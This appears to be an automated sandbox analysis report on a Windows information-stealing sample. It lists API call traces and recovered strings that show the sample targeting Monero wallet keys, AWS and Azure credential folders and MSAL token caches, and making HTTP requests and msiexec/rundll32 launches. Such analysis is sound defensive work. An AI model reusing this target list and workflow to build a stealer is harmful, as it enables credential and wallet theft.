                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002ECF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002ED0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002ED0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED208
                  • lstrcat.KERNEL32(?,00301478), ref: 002ED217
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED22A
                  • lstrcat.KERNEL32(?,0030147C), ref: 002ED239
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED24C
                  • lstrcat.KERNEL32(?,00301480), ref: 002ED25B
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED26E
                  • lstrcat.KERNEL32(?,00301484), ref: 002ED27D
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED290
                  • lstrcat.KERNEL32(?,00301488), ref: 002ED29F
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED2B2
                  • lstrcat.KERNEL32(?,0030148C), ref: 002ED2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 002ED2D4
                  • lstrcat.KERNEL32(?,00301490), ref: 002ED2E3
                    • Part of subcall function 002FA820: lstrlen.KERNEL32(002E4F05,?,?,002E4F05,00300DDE), ref: 002FA82B
                    • Part of subcall function 002FA820: lstrcpy.KERNEL32(00300DDE,00000000), ref: 002FA885
                  • lstrlen.KERNEL32(?), ref: 002ED32A
                  • lstrlen.KERNEL32(?), ref: 002ED339
                    • Part of subcall function 002FAA70: StrCmpCA.SHLWAPI(013287F0,002EA7A7,?,002EA7A7,013287F0), ref: 002FAA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 002ED3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 2b50b3adf582d277e0d5006e59a04b7749597dbe33a6986336d813b48af821ec
                  • Instruction ID: 2566738a2994d1a1b63e644f2e8f95ca22037394ca2199b268c694c582bbf6fc
                  • Opcode Fuzzy Hash: 2b50b3adf582d277e0d5006e59a04b7749597dbe33a6986336d813b48af821ec
                  • Instruction Fuzzy Hash: E6E124B19201089BCB14EBA0DD96EFEB378AF14740F504164F60BB6091DF75AE1ADF62
                  Function 002EC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0132DE48,00000000,?,0030144C,00000000,?,?), ref: 002ECA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 002ECA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 002ECA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002ECAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 002ECAD9
                  • StrStrA.SHLWAPI(?,0132DF08,00300B52), ref: 002ECAF7
                  • StrStrA.SHLWAPI(00000000,0132DF68), ref: 002ECB1E
                  • StrStrA.SHLWAPI(?,0132E5D8,00000000,?,00301458,00000000,?,00000000,00000000,?,01328940,00000000,?,00301454,00000000,?), ref: 002ECCA2
                  • StrStrA.SHLWAPI(00000000,0132E6F8), ref: 002ECCB9
                    • Part of subcall function 002EC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 002EC871
                    • Part of subcall function 002EC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 002EC87C
                  • StrStrA.SHLWAPI(?,0132E6F8,00000000,?,0030145C,00000000,?,00000000,013289E0), ref: 002ECD5A
                  • StrStrA.SHLWAPI(00000000,01328A80), ref: 002ECD71
                    • Part of subcall function 002EC820: lstrcat.KERNEL32(?,00300B46), ref: 002EC943
                    • Part of subcall function 002EC820: lstrcat.KERNEL32(?,00300B47), ref: 002EC957
                    • Part of subcall function 002EC820: lstrcat.KERNEL32(?,00300B4E), ref: 002EC978
                  • lstrlen.KERNEL32(00000000), ref: 002ECE44
                  • CloseHandle.KERNEL32(00000000), ref: 002ECE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 66b980041c62001bad3d428fca6cb77b1129e3ad9ce18d0edac821c3c2331617
                  • Instruction ID: 7679a7bf907a3c85f187d9a2dddd6742056371b377eb43b80fd8962b7b10e521
                  • Opcode Fuzzy Hash: 66b980041c62001bad3d428fca6cb77b1129e3ad9ce18d0edac821c3c2331617
                  • Instruction Fuzzy Hash: 4CE100B182010CABDB15EBA0DC92FFEB778AF14380F404179F20A66191DF706A5ACF61
                  Function 002F8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • RegOpenKeyExA.ADVAPI32(00000000,0132AC80,00000000,00020019,00000000,003005B6), ref: 002F83A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 002F8426
                  • wsprintfA.USER32 ref: 002F8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 002F847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F8499
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 6dc6ad9d155f412ea09dfcc7260b956466d3a146dfa2e6eb3220e12a0c6a8db8
                  • Instruction ID: a4e86a9f4c649bcfe68105d3ba826a2f55b6c031f5ec7c43666e17c69b751ed6
                  • Opcode Fuzzy Hash: 6dc6ad9d155f412ea09dfcc7260b956466d3a146dfa2e6eb3220e12a0c6a8db8
                  • Instruction Fuzzy Hash: 938110B192111C9BDB24DF50CC91FEAB7B8FF18740F0082A8E209A6150DF716B8ACF95
                  Function 002F4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 002F4DCD
                    • Part of subcall function 002F4910: wsprintfA.USER32 ref: 002F492C
                    • Part of subcall function 002F4910: FindFirstFileA.KERNEL32(?,?), ref: 002F4943
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 002F4E59
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,00300FDC), ref: 002F4971
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,00300FE0), ref: 002F4987
                    • Part of subcall function 002F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 002F4B7D
                    • Part of subcall function 002F4910: FindClose.KERNEL32(000000FF), ref: 002F4B92
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 002F4EE5
                    • Part of subcall function 002F4910: wsprintfA.USER32 ref: 002F49B0
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,003008D2), ref: 002F49C5
                    • Part of subcall function 002F4910: wsprintfA.USER32 ref: 002F49E2
                    • Part of subcall function 002F4910: PathMatchSpecA.SHLWAPI(?,?), ref: 002F4A1E
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,0132F270), ref: 002F4A4A
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,00300FF8), ref: 002F4A5C
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,?), ref: 002F4A70
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,00300FFC), ref: 002F4A82
                    • Part of subcall function 002F4910: lstrcat.KERNEL32(?,?), ref: 002F4A96
                    • Part of subcall function 002F4910: CopyFileA.KERNEL32(?,?,00000001), ref: 002F4AAC
                    • Part of subcall function 002F4910: DeleteFileA.KERNEL32(?), ref: 002F4B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: ca0bb1a56fb8f63b282d476e565a26a18934dd298fb5db736a860f36a1efd626
                  • Instruction ID: 8313d594a26fc665f3e5a1cc9444c6f5ac6b6b4b8bff45941ffe474c2d7c2294
                  • Opcode Fuzzy Hash: ca0bb1a56fb8f63b282d476e565a26a18934dd298fb5db736a860f36a1efd626
                  • Instruction Fuzzy Hash: 5F4194BA95020867DB24F770DC57FED7338AB64740F4045A4F289660C1EEB45BD98F92
                  Function 002F9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 002F906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: a4029b87406ea584dada2ee2d3cb92c317c813ba0eab4b54867742199fe15d71
                  • Instruction ID: dec4906ff5ed8cc6bf79caa017d763a7e5ff2bcae7b68171584895f4c1a47e91
                  • Opcode Fuzzy Hash: a4029b87406ea584dada2ee2d3cb92c317c813ba0eab4b54867742199fe15d71
                  • Instruction Fuzzy Hash: 26710AB1910208ABDB14EFE4DC89FEEB7B8BF58300F508118F615A7290DB74A955DB61
                  Function 002F2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F31C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F34EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 88aa4ddf36b6a3776d4da8ed63d9a7fb31e9e40f040d46a50eceed5191bb6db3
                  • Instruction ID: 107324ed13f76d985825933ce2d90a1310142aac628090c97bb0632df783779c
                  • Opcode Fuzzy Hash: 88aa4ddf36b6a3776d4da8ed63d9a7fb31e9e40f040d46a50eceed5191bb6db3
                  • Instruction Fuzzy Hash: B3120FB182010C9ADB19EBA0CC92FFDF778AF14380F504179E60A66195EF742B5ACF52
                  Function 002F52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E6280: InternetOpenA.WININET(00300DFE,00000001,00000000,00000000,00000000), ref: 002E62E1
                    • Part of subcall function 002E6280: StrCmpCA.SHLWAPI(?,0132F360), ref: 002E6303
                    • Part of subcall function 002E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E6335
                    • Part of subcall function 002E6280: HttpOpenRequestA.WININET(00000000,GET,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E6385
                    • Part of subcall function 002E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002E63BF
                    • Part of subcall function 002E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002E63D1
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 002F5318
                  • lstrlen.KERNEL32(00000000), ref: 002F532F
                    • Part of subcall function 002F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002F8E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 002F5364
                  • lstrlen.KERNEL32(00000000), ref: 002F5383
                  • lstrlen.KERNEL32(00000000), ref: 002F53AE
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: d89b19ea53d8a842dc2051148c96022fde9a0affe755590a8abef676d2453ed4
                  • Instruction ID: 20ac10c95ed5cabac44d7906b241057a5d13125b5d503189ea06af83c47a1869
                  • Opcode Fuzzy Hash: d89b19ea53d8a842dc2051148c96022fde9a0affe755590a8abef676d2453ed4
                  • Instruction Fuzzy Hash: 70511DB093014D9BCB14FF60C992AFDB778AF10380F908134EA0A5A591DF746B6ACF52
                  Function 002F12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 1e1c983a2feae8a03248e96409073e518631fa82069bd3cddb9d7bbe0926aba9
                  • Instruction ID: 6c25ad14cddf3ee05e86fe6cc6afdd7f6f1c8a5403fb72e0dcb5eee36f83515b
                  • Opcode Fuzzy Hash: 1e1c983a2feae8a03248e96409073e518631fa82069bd3cddb9d7bbe0926aba9
                  • Instruction Fuzzy Hash: 94C175B591011D9BCB14EF60DC89FFAB378BF64344F0045A8F60AA7241DB70AAA5DF91
                  Function 002F4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002F42EC
                  • lstrcat.KERNEL32(?,0132ED20), ref: 002F430B
                  • lstrcat.KERNEL32(?,?), ref: 002F431F
                  • lstrcat.KERNEL32(?,0132DED8), ref: 002F4333
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002F8D90: GetFileAttributesA.KERNEL32(00000000,?,002E1B54,?,?,0030564C,?,?,00300E1F), ref: 002F8D9F
                    • Part of subcall function 002E9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002E9D39
                    • Part of subcall function 002E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
